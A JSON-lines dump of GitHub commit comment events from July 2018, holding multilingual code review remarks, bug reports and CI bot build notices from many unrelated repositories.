{"id":"8021583007","type":"CommitCommentEvent","actor":{"login":"sizmailov"},"repo":{"name":"tqdm/tqdm"},"payload":{"comment":{"id":29841235,"position":12,"line":null,"path":"tqdm/_tqdm.py","commit_id":"dde670455efd24afed2d617319331efa7642f9be","created_at":"2018-07-26T09:40:00Z","updated_at":"2018-07-26T09:40:00Z","author_association":"NONE","body":"Yes, you are right. Old version does _two_ comparisons for hundreds while my version does _three_. I'll remove latter commit from PR. "}},"created_at":"2018-07-26T09:40:00Z"}
{"id":"8021585464","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29841242,"position":8,"line":8,"path":"M-2/05_dates.rb","commit_id":"ffac2ad391f8316183c4e778ff8d7174f2681ac1","created_at":"2018-07-26T09:40:27Z","updated_at":"2018-07-26T09:40:27Z","author_association":"NONE","body":" chomp можно не использовать перед to_i/to_f, потому-что эти методы сами убирают символ новой строки"}},"created_at":"2018-07-26T09:40:27Z"}
{"id":"8021586063","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29841243,"position":25,"line":13,"path":"class/gen.class.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T09:40:34Z","updated_at":"2018-07-26T09:40:34Z","author_association":"MEMBER","body":"Отсутствует обработка коллизий (это важно)\r\n\r\nСуществуют более оптимальные способы генерации коротких идентификаторов(это тонкости)"}},"created_at":"2018-07-26T09:40:34Z"}
{"id":"8021586823","type":"CommitCommentEvent","actor":{"login":"gkiagia"},"repo":{"name":"ToLABaki/tolabaki_admin"},"payload":{"comment":{"id":29841247,"position":4,"line":14,"path":"roles/dns_server/files/docker/Dockerfile","commit_id":"1e0e301a8b22555ae94d6eeef7b880ea964005f6","created_at":"2018-07-26T09:40:43Z","updated_at":"2018-07-26T09:40:43Z","author_association":"CONTRIBUTOR","body":"Ugh, this is ugly... why do you place this in /var/bind ? Why not place it in /etc like everything else, or even better place it in /etc/bind/zones on the host, which is mounted in the container?"}},"created_at":"2018-07-26T09:40:43Z"}
{"id":"8021589575","type":"CommitCommentEvent","actor":{"login":"inmadmin"},"repo":{"name":"pfsense/FreeBSD-ports"},"payload":{"comment":{"id":29841252,"position":null,"line":null,"path":null,"commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T09:41:13Z","updated_at":"2018-07-26T09:41:13Z","author_association":"NONE","body":"Since I installed the version 0.59_2 is the SNI functionality not longer working. The browser is receiving only the main certificate. The version 0.54_2 was working fine."}},"created_at":"2018-07-26T09:41:13Z"}
{"id":"8021592852","type":"CommitCommentEvent","actor":{"login":"gkiagia"},"repo":{"name":"ToLABaki/tolabaki_admin"},"payload":{"comment":{"id":29841262,"position":2,"line":2,"path":"roles/dns_server/files/.gitattributes","commit_id":"1e0e301a8b22555ae94d6eeef7b880ea964005f6","created_at":"2018-07-26T09:41:46Z","updated_at":"2018-07-26T09:41:46Z","author_association":"CONTRIBUTOR","body":"_acme-challenge.tolabaki.gr is a subdomain, therefore a zone. Why place it in a different directory and not in zones/ ?"}},"created_at":"2018-07-26T09:41:46Z"}
{"id":"8021593204","type":"CommitCommentEvent","actor":{"login":"kroitor"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29841263,"position":null,"line":null,"path":null,"commit_id":"213130c8102fa17117210cba60f64edeb9b5afe1","created_at":"2018-07-26T09:41:50Z","updated_at":"2018-07-26T09:41:50Z","author_association":"MEMBER","body":"Unfortunately, you're right, we had to delist it on civil grounds. Can't really tell, but we do apologize for the inconvenience. We may later reconsider adding support for it back.\r\n\r\nIf you still want to use it, here's the old code: https://github.com/ccxt/ccxt/blob/64b1666a065a760953554fb51611eb87814a40c5/js/cointiger.js\r\n\r\nYou can also `require()` this JS file into your project, it will monkey-patch itself into your ccxt in runtime if you want to continue using it: https://gist.github.com/kroitor/3dc0859778e39ddcc7b4da4d661977c5\r\n\r\nWe absolutely didn’t want to do it, but were left with no other choice. We had to pull back the support for it, until this resolved. We hope that this is just a temporary misunderstanding and it will be resolved soon, and we apologize to our users who are affected by this issue."}},"created_at":"2018-07-26T09:41:50Z"}
{"id":"8021593654","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29841265,"position":18,"line":18,"path":"M-2/05_dates.rb","commit_id":"ffac2ad391f8316183c4e778ff8d7174f2681ac1","created_at":"2018-07-26T09:41:55Z","updated_at":"2018-07-26T09:41:55Z","author_association":"NONE","body":"Это можно красиво решить без цикла. Рекомендую посмотреть в сторону методов first/take и sum для массивов"}},"created_at":"2018-07-26T09:41:55Z"}
{"id":"8021600040","type":"CommitCommentEvent","actor":{"login":"Moternum"},"repo":{"name":"Moternum/hello-world"},"payload":{"comment":{"id":29841286,"position":null,"line":null,"path":null,"commit_id":"dcb7129e6d3de30718ab214535d15d214b9264c7","created_at":"2018-07-26T09:43:07Z","updated_at":"2018-07-26T09:43:07Z","author_association":"OWNER","body":".."}},"created_at":"2018-07-26T09:43:07Z"}
{"id":"8021604718","type":"CommitCommentEvent","actor":{"login":"kalvakolanuramesh"},"repo":{"name":"kalvakolanuramesh/ramesh229"},"payload":{"comment":{"id":29841310,"position":null,"line":null,"path":null,"commit_id":"9af0329ddedf2a99c0c703795d08e888f7a80d75","created_at":"2018-07-26T09:43:57Z","updated_at":"2018-07-26T09:43:57Z","author_association":"OWNER","body":"gfdgfhy"}},"created_at":"2018-07-26T09:43:57Z"}
{"id":"8021607904","type":"CommitCommentEvent","actor":{"login":"gkiagia"},"repo":{"name":"ToLABaki/tolabaki_admin"},"payload":{"comment":{"id":29841316,"position":null,"line":null,"path":null,"commit_id":"cf345771c11d2219fbe0c1c07d13c47496b56b09","created_at":"2018-07-26T09:44:31Z","updated_at":"2018-07-26T09:44:31Z","author_association":"CONTRIBUTOR","body":"dns01hook.bash could be a template, it doesn't have anything secret in it to be encrypted. Same goes for the config and domains.txt"}},"created_at":"2018-07-26T09:44:31Z"}
{"id":"8021616451","type":"CommitCommentEvent","actor":{"login":"gkiagia"},"repo":{"name":"ToLABaki/tolabaki_admin"},"payload":{"comment":{"id":29841337,"position":10,"line":10,"path":"roles/acme_client/tasks/main.yml","commit_id":"cf345771c11d2219fbe0c1c07d13c47496b56b09","created_at":"2018-07-26T09:46:03Z","updated_at":"2018-07-26T09:46:03Z","author_association":"CONTRIBUTOR","body":"Oh and do configure your editor to leave trailing newline characters on the files... It's annoying to see those warnings from git (\"No newline at end of file\")"}},"created_at":"2018-07-26T09:46:03Z"}
{"id":"8021617926","type":"CommitCommentEvent","actor":{"login":"mkutny"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29841343,"position":null,"line":null,"path":null,"commit_id":"213130c8102fa17117210cba60f64edeb9b5afe1","created_at":"2018-07-26T09:46:19Z","updated_at":"2018-07-26T09:46:19Z","author_association":"CONTRIBUTOR","body":"Ok, clear."}},"created_at":"2018-07-26T09:46:19Z"}
{"id":"8021619525","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29841348,"position":null,"line":null,"path":null,"commit_id":"ac6ec315271f88b90e8a788b5851bb1fcd4489f2","created_at":"2018-07-26T09:46:38Z","updated_at":"2018-07-26T09:46:38Z","author_association":"MEMBER","body":"I wondered the same"}},"created_at":"2018-07-26T09:46:38Z"}
{"id":"8021621789","type":"CommitCommentEvent","actor":{"login":"Leetsong"},"repo":{"name":"Leetsong/HackerNewsAndroid"},"payload":{"comment":{"id":29841354,"position":null,"line":null,"path":null,"commit_id":"670b5c5ed51c83380ac09b0cce2d4ec8d5b924a9","created_at":"2018-07-26T09:47:05Z","updated_at":"2018-07-26T09:47:05Z","author_association":"OWNER","body":"@jingxinfan Not a place for chatting."}},"created_at":"2018-07-26T09:47:05Z"}
{"id":"8021622505","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29841356,"position":null,"line":null,"path":null,"commit_id":"e27d9e4dcb94317ff1ba7d607b4f0dd2e8341e73","created_at":"2018-07-26T09:47:12Z","updated_at":"2018-07-26T09:47:12Z","author_association":"COLLABORATOR","body":"@alejandroarturom \r\nBy most visited languages on the site, please do the following updates next, in this order (some you've already done and they repeat with variants)\r\n\r\n![screen shot 2018-07-26 at 3 46 37 am](https://user-images.githubusercontent.com/163977/43255248-902d04d8-9086-11e8-8a4f-df320bb71b07.png)\r\n"}},"created_at":"2018-07-26T09:47:12Z"}
{"id":"8021627475","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/c99-to-c89-feedstock"},"payload":{"comment":{"id":29841362,"position":null,"line":null,"path":null,"commit_id":"9edfffccd121b78f2706a01aec4b6930415fec08","created_at":"2018-07-26T09:48:10Z","updated_at":"2018-07-26T09:48:10Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-26T09:48:10Z"}
{"id":"8021634632","type":"CommitCommentEvent","actor":{"login":"gkiagia"},"repo":{"name":"ToLABaki/tolabaki_admin"},"payload":{"comment":{"id":29841373,"position":null,"line":null,"path":null,"commit_id":"cf345771c11d2219fbe0c1c07d13c47496b56b09","created_at":"2018-07-26T09:49:29Z","updated_at":"2018-07-26T09:49:29Z","author_association":"CONTRIBUTOR","body":"And one last thing, use \"admin@tolabaki.gr\" as the contact email in config. Looks more professional and we can easily change its destination at any time"}},"created_at":"2018-07-26T09:49:29Z"}
{"id":"8021641428","type":"CommitCommentEvent","actor":{"login":"hendrik1994"},"repo":{"name":"w3geek/randventure"},"payload":{"comment":{"id":29841384,"position":null,"line":null,"path":null,"commit_id":"5c7c1081b6c52ecffd190ae807aa58ed4018226c","created_at":"2018-07-26T09:50:47Z","updated_at":"2018-07-26T09:50:47Z","author_association":"COLLABORATOR","body":"Generiert Steine"}},"created_at":"2018-07-26T09:50:47Z"}
{"id":"8021643305","type":"CommitCommentEvent","actor":{"login":"adithok"},"repo":{"name":"flipsee/sgPools"},"payload":{"comment":{"id":29841391,"position":20,"line":20,"path":"sgPoolsModel.py","commit_id":"577d8ff2407f39b76a14f4646307e904f2095344","created_at":"2018-07-26T09:51:08Z","updated_at":"2018-07-26T09:51:08Z","author_association":"NONE","body":"6783"}},"created_at":"2018-07-26T09:51:08Z"}
{"id":"8021643996","type":"CommitCommentEvent","actor":{"login":"BingChengHe2018"},"repo":{"name":"abansal92/pairingmodel"},"payload":{"comment":{"id":29841393,"position":null,"line":null,"path":null,"commit_id":"9c57e4d77bdc69c4b81c2244a629163e8b5e5aa7","created_at":"2018-07-26T09:51:15Z","updated_at":"2018-07-26T09:51:15Z","author_association":"COLLABORATOR","body":"CCD in c"}},"created_at":"2018-07-26T09:51:15Z"}
{"id":"8021651349","type":"CommitCommentEvent","actor":{"login":"angelblue05"},"repo":{"name":"MediaBrowser/plugin.video.emby"},"payload":{"comment":{"id":29841407,"position":null,"line":null,"path":null,"commit_id":"3d67b79138db61d790549d07aa20aaca36f8c72c","created_at":"2018-07-26T09:52:37Z","updated_at":"2018-07-26T09:52:37Z","author_association":"CONTRIBUTOR","body":"Yes. Thanks, I was just about to revert the change."}},"created_at":"2018-07-26T09:52:37Z"}
{"id":"8021653103","type":"CommitCommentEvent","actor":{"login":"nehpetskie"},"repo":{"name":"jian916/rathena"},"payload":{"comment":{"id":29841415,"position":null,"line":null,"path":null,"commit_id":"2123ff7bc1f9876224cfb4ea8a5d99e4b604a204","created_at":"2018-07-26T09:52:56Z","updated_at":"2018-07-26T09:52:56Z","author_association":"NONE","body":"i got Error on PC.CPP\r\n"}},"created_at":"2018-07-26T09:52:56Z"}
{"id":"8021655360","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29841418,"position":null,"line":null,"path":null,"commit_id":"fcb926a8adc36c5ece9951c360f19fdf96763606","created_at":"2018-07-26T09:53:20Z","updated_at":"2018-07-26T09:53:20Z","author_association":"OWNER","body":"Following #30 "}},"created_at":"2018-07-26T09:53:20Z"}
{"id":"8021670239","type":"CommitCommentEvent","actor":{"login":"dindinw"},"repo":{"name":"DAGfans/DAG_paper"},"payload":{"comment":{"id":29841444,"position":null,"line":null,"path":null,"commit_id":"50932d770a13b71c23ebc0d1036ec0320b9c87d2","created_at":"2018-07-26T09:56:08Z","updated_at":"2018-07-26T09:56:08Z","author_association":"CONTRIBUTOR","body":"@SkyeOreo its' just fine, take it easy.  @forchain is it the latest version with corrections?  BTW, what's this ? https://eprint.iacr.org/2018/104.pdf phantom GHOST 合体？ "}},"created_at":"2018-07-26T09:56:08Z"}
{"id":"8021671938","type":"CommitCommentEvent","actor":{"login":"vikramalva"},"repo":{"name":"proteinevolution/Toolkit"},"payload":{"comment":{"id":29841448,"position":null,"line":null,"path":null,"commit_id":"d9c084006b2525d4f3a8170fc6b7546fcb951d75","created_at":"2018-07-26T09:56:27Z","updated_at":"2018-07-26T09:56:27Z","author_association":"MEMBER","body":"@zy4 as far as I understand, we send out data to sentry; right? "}},"created_at":"2018-07-26T09:56:27Z"}
{"id":"8021680039","type":"CommitCommentEvent","actor":{"login":"DovMiller"},"repo":{"name":"DevExpress-Examples/aspxdocumentviewer-how-to-dynamically-preview-a-report-in-document-viewer-after-a-button-w-t132094"},"payload":{"comment":{"id":29841463,"position":null,"line":null,"path":null,"commit_id":"5f4e4dacd19e5c5734754284bed1f3047074633e","created_at":"2018-07-26T09:57:56Z","updated_at":"2018-07-26T09:57:56Z","author_association":"NONE","body":"Got it.\nThank you very much.\nDov\n\nOn Thu, Jul 26, 2018 at 12:03 PM, MikhailTymchukDX <notifications@github.com\n> wrote:\n\n> I checked the link and it leads to the repository root, where you can\n> navigate C# code located in the CS folder:\n> [image: 2018-07-26_11-53-26]\n> <https://user-images.githubusercontent.com/17080984/43252267-c11aba60-90ca-11e8-88a2-308edca8901d.gif>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DevExpress-Examples/aspxdocumentviewer-how-to-dynamically-preview-a-report-in-document-viewer-after-a-button-w-t132094/commit/5f4e4dacd19e5c5734754284bed1f3047074633e#commitcomment-29840785>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcFfpaaRl6ziHWC2Jve-lcz45kQIB_8Aks5uKYXWgaJpZM4Vf-3z>\n> .\n>\n"}},"created_at":"2018-07-26T09:57:56Z"}
{"id":"8021685889","type":"CommitCommentEvent","actor":{"login":"mig42"},"repo":{"name":"mig42/wcf"},"payload":{"comment":{"id":29841479,"position":5,"line":54,"path":"src/System.Private.ServiceModel/src/System/ServiceModel/Channels/HttpChannelFactory.cs","commit_id":"c931e26671d5df4ee96762c1a9c68989390a3406","created_at":"2018-07-26T09:59:03Z","updated_at":"2018-07-26T09:59:03Z","author_association":"OWNER","body":"Nope, sorry about that :( I was just trying out a custom tool and I didn't realize that this would send notifications to the committer"}},"created_at":"2018-07-26T09:59:03Z"}
{"id":"8021687858","type":"CommitCommentEvent","actor":{"login":"nle-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29841485,"position":null,"line":null,"path":null,"commit_id":"2054b5928574affbb7efcd8a9ab146ee4fa34938","created_at":"2018-07-26T09:59:25Z","updated_at":"2018-07-26T09:59:25Z","author_association":"CONTRIBUTOR","body":"@chrisdilbert \r\n\r\nThanks. I have reproduced and I am testing a fix that may be merged soon: https://github.com/odoo/odoo/pull/25984"}},"created_at":"2018-07-26T09:59:25Z"}
{"id":"8025838372","type":"CommitCommentEvent","actor":{"login":"jjongyeonglee"},"repo":{"name":"gangnamjava/java-example"},"payload":{"comment":{"id":29851987,"position":86,"line":86,"path":"pangjaehun","commit_id":"485f357042f361fed1a5f212dfe5292f1a033fac","created_at":"2018-07-27T00:03:38Z","updated_at":"2018-07-27T00:03:38Z","author_association":"CONTRIBUTOR","body":"아 그리고 \r\n```\r\narea = radius * radius * 3.14;\r\n```\r\n이부분은 어차피 상수니까 이런식으로 표현하는게 더 좋지 않을까 싶네요\r\n\r\n```\r\ndobule getArea() {\r\n    dobule area;\r\n    fianl double PI = 3.14159;\r\n    area radius * radius * PI;\r\n    return area;\r\n}\r\n```\r\n"}},"created_at":"2018-07-27T00:03:38Z"}
{"id":"8025839923","type":"CommitCommentEvent","actor":{"login":"Jefersonnnn"},"repo":{"name":"DouglasGiovanella/BotnetHardCore"},"payload":{"comment":{"id":29851994,"position":null,"line":null,"path":null,"commit_id":"ef5218a10fe8299d7f1ec8434ccec3417d455b3e","created_at":"2018-07-27T00:04:15Z","updated_at":"2018-07-27T00:04:15Z","author_association":"COLLABORATOR","body":"???????????"}},"created_at":"2018-07-27T00:04:15Z"}
{"id":"8025840071","type":"CommitCommentEvent","actor":{"login":"vlanard"},"repo":{"name":"Patreon/platform-documentation"},"payload":{"comment":{"id":29851995,"position":null,"line":null,"path":null,"commit_id":"8eba19b3bd57542cc0754bace6b7f79003bd994d","created_at":"2018-07-27T00:04:19Z","updated_at":"2018-07-27T00:04:19Z","author_association":"NONE","body":"@phildini tweaks. I will backport to patreon_py for future regeneration"}},"created_at":"2018-07-27T00:04:19Z"}
{"id":"8025842204","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852003,"position":null,"line":null,"path":null,"commit_id":"6d3facc741cab8cd093a7affcddacee8abb6832d","created_at":"2018-07-27T00:05:10Z","updated_at":"2018-07-27T00:05:10Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1700 of 1700 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.03%25-green.png)</a>\n"}},"created_at":"2018-07-27T00:05:10Z"}
{"id":"8025842602","type":"CommitCommentEvent","actor":{"login":"dataknut"},"repo":{"name":"dataknut/nzGREENGridDataR"},"payload":{"comment":{"id":29852006,"position":36,"line":461,"path":"R/gridSpyData.R","commit_id":"12b4d2eb588c999d5cf848f863974e4314b336f9","created_at":"2018-07-27T00:05:20Z","updated_at":"2018-07-27T00:05:20Z","author_association":"OWNER","body":"#1 fixed here"}},"created_at":"2018-07-27T00:05:20Z"}
{"id":"8025845345","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29852027,"position":null,"line":null,"path":null,"commit_id":"c96d7ac77fb19aa6c1b51afdb0b2bf6f0abf681f","created_at":"2018-07-27T00:06:22Z","updated_at":"2018-07-27T00:06:22Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.252`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/252) :tada:"}},"created_at":"2018-07-27T00:06:22Z"}
{"id":"8025851222","type":"CommitCommentEvent","actor":{"login":"penfold42"},"repo":{"name":"jgarff/rpi_ws281x"},"payload":{"comment":{"id":29852114,"position":null,"line":null,"path":null,"commit_id":"caa135d2216400c8f7d4aaff956ba5347a4463ef","created_at":"2018-07-27T00:08:37Z","updated_at":"2018-07-27T00:08:37Z","author_association":"CONTRIBUTOR","body":"What’s your your version string\r\ncat /proc/cpuinfo"}},"created_at":"2018-07-27T00:08:37Z"}
{"id":"8025852277","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29852120,"position":null,"line":null,"path":null,"commit_id":"c96d7ac77fb19aa6c1b51afdb0b2bf6f0abf681f","created_at":"2018-07-27T00:09:01Z","updated_at":"2018-07-27T00:09:01Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.381`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/408746387) :tada:"}},"created_at":"2018-07-27T00:09:01Z"}
{"id":"8025852321","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29852122,"position":null,"line":null,"path":null,"commit_id":"143a08d34a37437a9c3ca0c6a61e1f2e58b0f481","created_at":"2018-07-27T00:09:02Z","updated_at":"2018-07-27T00:09:02Z","author_association":"OWNER","body":"There's always something..."}},"created_at":"2018-07-27T00:09:02Z"}
{"id":"8025854927","type":"CommitCommentEvent","actor":{"login":"npardon"},"repo":{"name":"npardon/toolkitten"},"payload":{"comment":{"id":29852136,"position":null,"line":null,"path":null,"commit_id":"774f480bff2d16c2a2c7397f5831d4ce027b20d9","created_at":"2018-07-27T00:10:06Z","updated_at":"2018-07-27T00:10:06Z","author_association":"OWNER","body":"update local repository with 1WTT"}},"created_at":"2018-07-27T00:10:06Z"}
{"id":"8025859809","type":"CommitCommentEvent","actor":{"login":"stibanez"},"repo":{"name":"stibanez/healthrecords-softdev"},"payload":{"comment":{"id":29852152,"position":null,"line":null,"path":null,"commit_id":"54461376d0eabf4ba799c180923761aca9eda9df","created_at":"2018-07-27T00:12:05Z","updated_at":"2018-07-27T00:12:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Register Person](https://trello.com/c/16rHs1AP/10-register-person)"}},"created_at":"2018-07-27T00:12:05Z"}
{"id":"8025860037","type":"CommitCommentEvent","actor":{"login":"stibanez"},"repo":{"name":"stibanez/healthrecords-softdev"},"payload":{"comment":{"id":29852153,"position":null,"line":null,"path":null,"commit_id":"106f493d4ae9d15f1b315bb7279f8f477f37cd3b","created_at":"2018-07-27T00:12:10Z","updated_at":"2018-07-27T00:12:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Register Person](https://trello.com/c/16rHs1AP/10-register-person)"}},"created_at":"2018-07-27T00:12:10Z"}
{"id":"8025869130","type":"CommitCommentEvent","actor":{"login":"MRTHAKER"},"repo":{"name":"MRTHAKER/android_device_zuk_z2_plus"},"payload":{"comment":{"id":29852173,"position":null,"line":null,"path":null,"commit_id":"aa4408da5d0c3cec3405700f21fb2a0f6724d195","created_at":"2018-07-27T00:15:36Z","updated_at":"2018-07-27T00:15:36Z","author_association":"OWNER","body":"https://drive.google.com/open?id=1fm18nyRjKfxNiTu04DBj8i7S3FqXzlMs"}},"created_at":"2018-07-27T00:15:36Z"}
{"id":"8025869351","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29852175,"position":null,"line":null,"path":null,"commit_id":"be9bbba06dd3663f5745e2c9d7978c7f529d7103","created_at":"2018-07-27T00:15:42Z","updated_at":"2018-07-27T00:15:42Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/mono-2018-06-system-native/1/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/mono-2018-06-system-native/1//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-06-system-native/be9bbba06dd3663f5745e2c9d7978c7f529d7103/1/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-06-system-native/be9bbba06dd3663f5745e2c9d7978c7f529d7103/1/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-06-system-native/be9bbba06dd3663f5745e2c9d7978c7f529d7103/1/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/mono-2018-06-system-native/be9bbba06dd3663f5745e2c9d7978c7f529d7103/1/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n<details>\n<summary>3 tests failed, 0 tests skipped, 222 tests passed.</summary>\n\n## Failed tests\n\n * System/Mac/Modern: Failed (Test run failed.)\n * MSBuild tests/iOS: Failed (Execution failed with exit code 1)\n * MTouch tests/NUnit: Failed (Execution failed with exit code 6)\n</details>\n"}},"created_at":"2018-07-27T00:15:42Z"}
{"id":"8025869506","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29852176,"position":null,"line":null,"path":null,"commit_id":"9bcb8a2fd4fb894cbd0d930755d83e3779825c1b","created_at":"2018-07-27T00:15:45Z","updated_at":"2018-07-27T00:15:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Build out Backend SQL](https://trello.com/c/XPsD1M9M/9-build-out-backend-sql)"}},"created_at":"2018-07-27T00:15:45Z"}
{"id":"8025869567","type":"CommitCommentEvent","actor":{"login":"benz11260"},"repo":{"name":"benz11260/Seagate-iBenz"},"payload":{"comment":{"id":29852177,"position":1,"line":1,"path":"README.md","commit_id":"86c24b2446c330b429ce6364cfa9c73d6223dc60","created_at":"2018-07-27T00:15:46Z","updated_at":"2018-07-27T00:15:46Z","author_association":"OWNER","body":"\r\n# Seagate-iBenz"}},"created_at":"2018-07-27T00:15:46Z"}
{"id":"8025870013","type":"CommitCommentEvent","actor":{"login":"Maayu2415"},"repo":{"name":"MetaMask/metamask-extension"},"payload":{"comment":{"id":29852181,"position":null,"line":null,"path":null,"commit_id":"a97583b03913a43ef7575546977087cfbaaa9ad7","created_at":"2018-07-27T00:15:58Z","updated_at":"2018-07-27T00:15:58Z","author_association":"NONE","body":"เกิดอะไรขึ้น"}},"created_at":"2018-07-27T00:15:58Z"}
{"id":"8025871248","type":"CommitCommentEvent","actor":{"login":"infinitydev4"},"repo":{"name":"infinitydev4/Promenade_chien"},"payload":{"comment":{"id":29852184,"position":null,"line":null,"path":null,"commit_id":"625c5978c8fb7ee170c8727e603fb20458759e06","created_at":"2018-07-27T00:16:29Z","updated_at":"2018-07-27T00:16:29Z","author_association":"OWNER","body":"decompressez le fichier zip "}},"created_at":"2018-07-27T00:16:29Z"}
{"id":"8025871989","type":"CommitCommentEvent","actor":{"login":"CowboyKen"},"repo":{"name":"muhammednagy/peatio"},"payload":{"comment":{"id":29852189,"position":null,"line":null,"path":null,"commit_id":"1b182368e6f24f8fd48d917d30131d63cadd48ce","created_at":"2018-07-27T00:16:48Z","updated_at":"2018-07-27T00:16:48Z","author_association":"NONE","body":"Good work as always Nagy!"}},"created_at":"2018-07-27T00:16:48Z"}
{"id":"8025874305","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29852198,"position":7,"line":36,"path":"BsuirFind.Foundation/Services/TaskService.cs","commit_id":"11f4c85f05565bc70a90703e0646e2a9d1be95f2","created_at":"2018-07-27T00:17:41Z","updated_at":"2018-07-27T00:17:41Z","author_association":"OWNER","body":"@gmltA \r\nallways add an empty row before return"}},"created_at":"2018-07-27T00:17:41Z"}
{"id":"8025877692","type":"CommitCommentEvent","actor":{"login":"benz11260"},"repo":{"name":"benz11260/Seagate-iBenz"},"payload":{"comment":{"id":29852212,"position":null,"line":null,"path":null,"commit_id":"86c24b2446c330b429ce6364cfa9c73d6223dc60","created_at":"2018-07-27T00:18:57Z","updated_at":"2018-07-27T00:18:57Z","author_association":"OWNER","body":"[LICENSE.txt](https://github.com/benz11260/Seagate-iBenz/files/2233966/LICENSE.txt)\r\n[LICENSE.txt](https://github.com/benz11260/Seagate-iBenz/files/2233970/LICENSE.txt)\r\n"}},"created_at":"2018-07-27T00:18:57Z"}
